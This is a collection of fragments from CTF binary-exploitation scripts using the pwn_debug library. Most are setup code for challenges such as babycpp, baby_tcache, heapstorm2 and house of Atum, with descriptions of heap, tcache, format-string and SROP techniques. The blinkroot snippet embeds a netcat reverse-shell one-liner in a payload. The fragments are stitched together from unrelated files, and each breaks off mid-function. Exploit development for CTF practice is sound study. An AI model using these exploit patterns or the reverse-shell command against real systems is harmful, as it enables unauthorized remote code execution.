def run_exp(ip, port, remote): global pdbg global p global membp global elf global libc pdbg = pwn_debug("./babycpp") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #elf=pdbg.elf #libc=pdbg.libc pdbg.local() pdbg.debug("2.27") pdbg.remote(ip, port) while 1: try: p = pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") elf = pdbg.elf libc = pdbg.libc if not remote: membp = pdbg.membp flag = pwn(remote) if flag: print flag return flag except Exception, e: print str(e) p.close()
def run_exp(ip,port,remote): global pdbg global p global membp global elf global libc pdbg=pwn_debug("./one") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local() pdbg.debug("2.27") pdbg.remote(ip, port) #p=pdbg.run("local") #p=pdbg.run("remote") if not remote: p=pdbg.run("debug") #p=pdbg.run("local") membp=pdbg.membp else: p=pdbg.run("remote") elf=pdbg.elf libc=pdbg.libc flag=pwn(remote) return flag
def run_exp(ip, port, remote): global pdbg global p global membp global elf global libc pdbg = pwn_debug("./trywrite") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.context.log_level="debug" pdbg.local("./libc-2.27.so") pdbg.debug("2.27") pdbg.remote(ip, port) if not remote: #p=pdbg.run("debug") p = pdbg.run("local") membp = pdbg.membp else: p = pdbg.run("remote") elf = pdbg.elf libc = pdbg.libc flag = pwn(remote) return flag
def run_exp(ip, port, remote): global pdbg global p global membp global elf global libc pdbg = pwn_debug("./random") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.context.log_level='debug' pdbg.local("./libc-2.23.so", "/glibc/x64/2.23/lib/ld-2.23.so") pdbg.debug("2.23") pdbg.remote(ip, port, "./libc-2.23.so") if not remote: #p=pdbg.run("debug") p = pdbg.run("local") membp = pdbg.membp else: p = pdbg.run("remote") elf = pdbg.elf libc = pdbg.libc flag = pwn(remote) return flag
# File: exp.py # Author: raycp # Date: 2019-06-10 # Description: exp for neighbor_c, bruteforce to guess stack addr and stdout addt by 4bytes, and change stderr.fileno to 1, which then can leak address. then write one gadget to malloc_hook, at last trigger malloc from pwn_debug import * pdbg = pwn_debug("./neighbor_c") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def format_one(payload): p.sendline(payload)
from pwn_debug import * pdbg = pwn_debug("./anti") pdbg.context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' pdbg.local("") pdbg.debug("2.23") pdbg.remote('172.1.2.15', 9999, "./libc-2.23.so") switch = 1 if switch == 1: p = pdbg.run("local") elif switch == 2: p = pdbg.run("debug") elif switch == 3: p = pdbg.run("remote") #----------------------------------------------------------------------------------------- s = lambda data: p.send(str(data)) #in case that data is an int sa = lambda delim, data: p.sendafter(str(delim), str(data)) sl = lambda data: p.sendline(str(data)) sla = lambda delim, data: p.sendlineafter(str(delim), str(data)) r = lambda numb=4096: p.recv(numb) ru = lambda delims, drop=True: p.recvuntil(delims, drop) it = lambda: p.interactive() uu32 = lambda data: u32(data.ljust(4, '\0')) uu64 = lambda data: u64(data.ljust(8, '\0')) bp = lambda bkp: pdbg.bp(bkp) sym = lambda symbol: pdbg.sym(symbol) def bpp():
# File: IO_FILE_str_finish_vtable_bypass.py # Author: raycp # Date: 2019-06-01 # Description: template for bypass vtable check with str_jumps vtable from pwn_debug import * pdbg=pwn_debug("./binary") pdbg.context.terminal=['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc def pwn(): #pdbg.bp([]) libc_base=0x0 io_list_all=libc_base+libc.symbols['_IO_list_all']
# File: exp.py # Author: raycp # Date: 2019-06-02 # Description: exp for syscall_interface from pwn_debug import * pdbg = pwn_debug("./syscall_interface") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #context.log_level="debug" #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def syscall(syscall_number, arg): p.recvuntil("choice:") p.sendline("0") p.recvuntil("number:") p.sendline(str(syscall_number))
from pwn_debug import * pdbg=pwn_debug("./babygame") pdbg.context.terminal=['tmux', 'splitw', '-h'] context.log_level='debug' pdbg.local("") pdbg.debug("2.23") pdbg.remote() switch=1 if switch==1: p=pdbg.run("local") elif switch==2: p=pdbg.run("debug") elif switch==3: p=pdbg.run("remote") #----------------------------------------------------------------------------------------- s = lambda data :p.send(str(data)) #in case that data is an int sa = lambda delim,data :p.sendafter(str(delim), str(data)) sl = lambda data :p.sendline(str(data)) sla = lambda delim,data :p.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) it = lambda :p.interactive() uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) bp = lambda bkp :pdbg.bp(bkp) sym = lambda symbol :pdbg.sym(symbol) def bpp(): bp([])
# File: exp.py # Author: raycp # Date: 2019-06-09 # Description: exp for HeapsOfPrint, form a loop by format vlun and write by rbp from pwn_debug import * pdbg = pwn_debug("./HeapsOfPrint") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def format_one(payload): p.sendline(payload)
from pwn_debug import * ## step 1 pdbg = pwn_debug("test-fopen") pdbg.context.terminal = ['tmux', 'splitw', '-h'] ## step 2 pdbg.local("libc.so.6") pdbg.debug("2.23") #pdbg.remote('34.92.96.238',10000) ## step 3 #p=pdbg.run("debug") #p=pdbg.run("remote") # pause() pdbg.bp([0x400450]) p = pdbg.run("local") p.interactive()
# File: exp.py # Author: raycp # Date: 2019-05-31 # Description: exp for blinkroot from pwn_debug import * pdbg = pwn_debug("./blinkroot") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") elf = pdbg.elf libc = pdbg.libc def pwn(): addr = 0x600BC0 plt0 = 0x600B40 payload = p64(0x10000000000000000 - (addr - plt0)) payload += p64(addr + 0x100) payload += "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" payload = payload.ljust(0x100, '\x00')
# File: exp.py # Author: raycp # Date: 2019-06-02 # Description: exp for gundam from pwn_debug import * pdbg=pwn_debug("./gundam") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(name,typ): p.recvuntil("choice : ") p.sendline("1") p.recvuntil("gundam :")
# File: exp.py # Author: raycp # Date: 2019-06-03 # Description: exp for baby_tcache, unlink to form overlap chunk by off-by-null vuln,bruteforce to overwrite stdout to leak from pwn_debug import * pdbg = pwn_debug("./baby_tcache") pdbg.context.terminal = ['tmux', 'splitw', '-h'] pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) p = pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def new(size, content): p.recvuntil("choice: ") p.sendline("1") p.recvuntil("Size:")
from pwn_debug import * import time pdbg = pwn_debug("printf_test") pdbg.context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' pdbg.local("") pdbg.remote() switch = 1 if switch == 1: p = pdbg.run("local") elif switch == 2: p = pdbg.run("debug") elif switch == 3: p = pdbg.run("remote") #----------------------------------------------------------------------------------------- s = lambda data: p.send(str(data)) #in case that data is an int sa = lambda delim, data: p.sendafter(str(delim), str(data)) sl = lambda data: p.sendline(str(data)) sla = lambda delim, data: p.sendlineafter(str(delim), str(data)) r = lambda numb=4096: p.recv(numb) ru = lambda delims, drop=True: p.recvuntil(delims, drop) it = lambda: p.interactive() uu32 = lambda data: u32(data.ljust(4, '')) uu64 = lambda data: u64(data.ljust(8, '')) bp = lambda bkp: pdbg.bp(bkp) def bpp(m=[]): bp(m)
# File: exp.py # Author: raycp # Date: 2019-05-21 # Description: exp for babyprintf_ver2 from pwn_debug import * pdbg = pwn_debug("babyprintf_ver2") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.context.log_level="debug" pdbg.local("./libc64.so", "/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.24") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print type(pdbg.membp) #print pdbg.hh print hex(membp.elf_base), hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_base def do_one(data): p.send(data)
# File: exp.py # Author: raycp # Date: 2019-05-28 # Description: exp for 2ez4u from pwn_debug import * pdbg=pwn_debug("./2ez4u") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local("./libc.so","/glibc/x64/2.24/lib/ld-2.24.so") pdbg.debug("2.24") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print type(pdbg.membp) #print pdbg.hh #print hex(membp.elf_base),hex(membp.libc_base) #elf=pdbg.elf libc=pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_basei def add(size,desc,color='0',value='0',num='0'): p.recvuntil("hoice: ") p.sendline("1")
# File: exp.py # Author: raycp # Date: 2019-05-31 # Description: exp for babystack from pwn_debug import * pdbg = pwn_debug("./babystack") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #a=IO_FILE_plus() #print a #a.show() def pwn(): p3_ret = 0x080484e9 #: pop esi ; pop edi ; pop ebp ; ret pebp_ret = 0x080484eb #: pop ebp ; ret leave_ret = 0x080483a8 # : leave ; ret
# File: exp.py # Author: raycp # Date: 2019-06-06 # Description: exp for house of atum, tcache and fastbin chain to form the 0x10 byte backwards from pwn_debug import * pdbg = pwn_debug("./houseofAtum") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(content): p.recvuntil("choice:") p.sendline("1") p.recvuntil("ontent:")
# File: exp.py # Author: raycp # Date: 2019-06-03 # Description: exp for god-the-reum,uaf in withdraw function from pwn_debug import * pdbg = pwn_debug("./god-the-reum") pdbg.context.terminal = ['tmux', 'splitw', '-h'] pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) p = pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def create(eth): p.recvuntil("choice : ") p.sendline("1") p.recvuntil("eth? : ")
# File: exp.py # Author: raycp # Date: 2019-06-02 # Description: template for srop from pwn_debug import * pdbg = pwn_debug("./smallest") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def pwn(): ## sigreturn syscall number is 15 in x64, 119 in x86 frame = SigreturnFrame()
from pwn_debug import * pdbg = pwn_debug("./pwn") pdbg.context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' pdbg.local("") pdbg.remote() switch = 1 if switch == 1: p = pdbg.run("local") elif switch == 2: p = pdbg.run("debug") elif switch == 3: p = pdbg.run("remote") #----------------------------------------------------------------------------------------- s = lambda data: p.send(str(data)) #in case that data is an int sa = lambda delim, data: p.sendafter(str(delim), str(data)) sl = lambda data: p.sendline(str(data)) sla = lambda delim, data: p.sendlineafter(str(delim), str(data)) r = lambda numb=4096: p.recv(numb) ru = lambda delims, drop=True: p.recvuntil(delims, drop) it = lambda: p.interactive() uu32 = lambda data: u32(data.ljust(4, '\0')) uu64 = lambda data: u64(data.ljust(8, '\0')) bp = lambda bkp: pdbg.bp(bkp) def bpp(): bp([])
# File: exp.py # Author: raycp # Date: 2019-06-03 # Description: exp for children_tcache,unlink to form overlap chunk by off-by-null vuln from pwn_debug import * pdbg=pwn_debug("./children_tcache") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local("./libc-2.27.so","/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) p=pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def new(size,content): p.recvuntil("choice: ") p.sendline("1")
# File: exp.py # Author: raycp # Date: 2019-06-06 # Description: exp for three, uaf to brute force to overwrite stdout to leak libc from pwn_debug import * pdbg=pwn_debug("./three") pdbg.context.terminal=['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(content): p.recvuntil("choice:") p.sendline("1")
# File: exp.py # Author: raycp # Date: 2019-05-29 # Description: exp for heapstorm2 from pwn_debug import * pdbg = pwn_debug("./heapstorm2") pdbg.context.terminal = ['tmux', 'splitw', '-h'] pdbg.local("") pdbg.debug("2.23") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print type(pdbg.membp) #print pdbg.hh #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_basei def add(size, ): p.recvuntil("mand: ")
# File: exp.py # Author: raycp # Date: 2019-06-06 # Description: exp for girlfriend, bypass double free check for tcache in glibc 2.29 from pwn_debug import * pdbg = pwn_debug("./chall") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(size, name, phone): p.recvuntil("choice:") p.sendline("1") p.recvuntil("girl's name")
from pwn_debug import * import time pdbg = pwn_debug("pwn") pdbg.context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' pdbg.local("") pdbg.remote() switch = 1 if switch == 1: p = pdbg.run("local") elif switch == 2: p = pdbg.run("debug") elif switch == 3: p = pdbg.run("remote") #----------------------------------------------------------------------------------------- s = lambda data: p.send(str(data)) #in case that data is an int sa = lambda delim, data: p.sendafter(str(delim), str(data)) sl = lambda data: p.sendline(str(data)) sla = lambda delim, data: p.sendlineafter(str(delim), str(data)) r = lambda numb=4096: p.recv(numb) ru = lambda delims, drop=True: p.recvuntil(delims, drop) it = lambda: p.interactive() uu32 = lambda data: u32(data.ljust(4, '\x00')) uu64 = lambda data: u64(data.ljust(8, '\x00')) bp = lambda bkp: pdbg.bp(bkp) def bpp(m=[]): bp(m) input()
# File: exp.py # Author: raycp # Date: 2019-05-21 # Description: exp for stackoverflow from pwn_debug import * pdbg=pwn_debug("stackoverflow") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local() pdbg.debug("2.24") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print type(pdbg.membp) #print pdbg.hh #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_base def malloc_one(size=0,data="",real_size=0,flag=False): p.recvuntil("flow: ") p.sendline(str(size))
# File: exp.py # Author: raycp # Date: 2019-06-08 # Description: exp for EasiestPrintf, trigger malloc by printf from pwn_debug import * pdbg = pwn_debug("./EasiestPrintf") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def pwn(): pdbg.bp(0x804881C) p.recvuntil("read:\n")
# File: exp.py # Author: raycp # Date: 2019-05-29 # Description: exp for babyheap from pwn import * from pwn_debug import * pdbg=pwn_debug("babyheap") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local("./libc-2.23.so") pdbg.debug("2.23") pdbg.remote('123.206.174.203', 20001,"./libc-2.23.so") #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") #membp=pdbg.membp #print type(pdbg.membp) #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_base def add(size): p.recvuntil("Choice: ")